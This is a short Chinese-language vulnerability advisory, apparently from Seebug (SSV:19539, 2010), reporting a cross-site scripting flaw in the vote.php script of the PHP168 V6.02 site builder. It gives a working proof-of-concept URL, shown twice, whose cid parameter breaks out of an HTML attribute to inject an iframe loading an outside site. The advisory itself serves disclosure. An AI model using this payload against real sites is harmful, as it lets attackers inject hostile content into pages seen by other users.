PHP168 V6.02 vote.php存在跨站漏洞

2010-05-02T00:00:00
ID SSV:19539
Type seebug
Reporter Root
Modified 2010-05-02T00:00:00

Description

PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使 用。

跨站demo: http://v6.php168.com/do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E

PHP168 V6.02 等待补丁

                                        
                                            
                                                /do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E